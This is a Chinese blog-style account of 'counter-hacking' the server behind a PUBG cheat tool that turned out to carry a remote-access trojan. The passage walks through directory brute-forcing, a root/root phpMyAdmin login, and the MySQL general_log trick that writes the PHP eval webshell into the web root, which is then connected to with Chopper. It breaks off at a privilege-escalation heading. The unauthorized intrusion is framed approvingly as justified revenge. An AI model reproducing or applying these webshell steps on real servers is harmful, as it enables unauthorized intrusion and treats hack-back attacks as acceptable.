记一次对PUBG吃鸡外挂病毒的反制过程

这事还要从一只蝙蝠开始说起~...........疫情的原因在家闲的翻箱倒柜，翻出了这么个玩意，没错这就是“压*神器”想当初我把把落地成盒又在某宝铺天盖地的推送下，忍痛割爱花了百来块钱买了这神器。

买回来后开始后悔了，经过简单的观察分析此USB的行为，并非啥智能压*芯片，实际上就是一个软件加密狗的USB加密了商家给发的无后坐软件，通过对某宝搜索加密狗USB看看这价格，属实暴利。

0X01    故事开始：

因翻出了此USB加密狗，心血来潮想开把游戏试试还有没有效果，进入商家之前提供的下载地址下载软件，这次幸运的忘了关杀毒软件，哦豁？？这是嘛呀，这图标咋这么熟悉呢，这不是赤裸裸的远控吗，难怪商家之前一直强调要先关了杀毒软件在打开，原来藏着这么大的猫腻。

之前也一直傻愣愣的把杀毒软件都关了才开始玩的，USB是从去年四月份购入的，合着当了差不多一年的肉鸡了，坑我钱封我号就算了还拿我当肉鸡使，这谁受得了必须得搞。

0X02    信息收集

二话不说直接丢到微步沙箱分析一波看看能不能挖出什么重要的信息，软件的持久化跟读取系统信息这类的高危操作行为，确定远控无疑了。

再翻翻有没有跟软件交互的ip或者URL做为入手点，果不其然在大量的URL链接中发现了一条开着http协议的ip地址。

访问之~其内容就是软件上的公告，确定了这台ip是软件的服务器没跑了。

既然开了web的服务，直接上dirmap强大的目录探测工具看看能不能跑出啥重要信息，速度很快不一会探测出了PHPmyadmin等信息。

直接复制路径访问，习惯性的一波弱口令root/root给进去了.......像这类的软件作者安全意识很低几乎没有，因为没有人去抓包去分析流量很难发现背后所交互的ip，果然又是一套phpStudy搭建起来的web服务。

0X03    Getshell

因为已经拿到了phpmyadmin的数据库且还是root权限的，可利用数据库的日志导出功能导出一句话php。

先手动开启日志set global  general_log='on'

检查是否开启成功show variables like "general_log%"

设置日志文件输出的路径，结合PHPinfo文件得到网站的绝对路径，直接输出到web路径下。

set global  general_log_file ="C:phpStudyPHPTutorialWWWinfo.php"

写入一句话，输出到日志文件中。select '<?php eval($_POST['tools']);?>'

菜刀连接上刚刚导出的一句话。

0X04    权限提升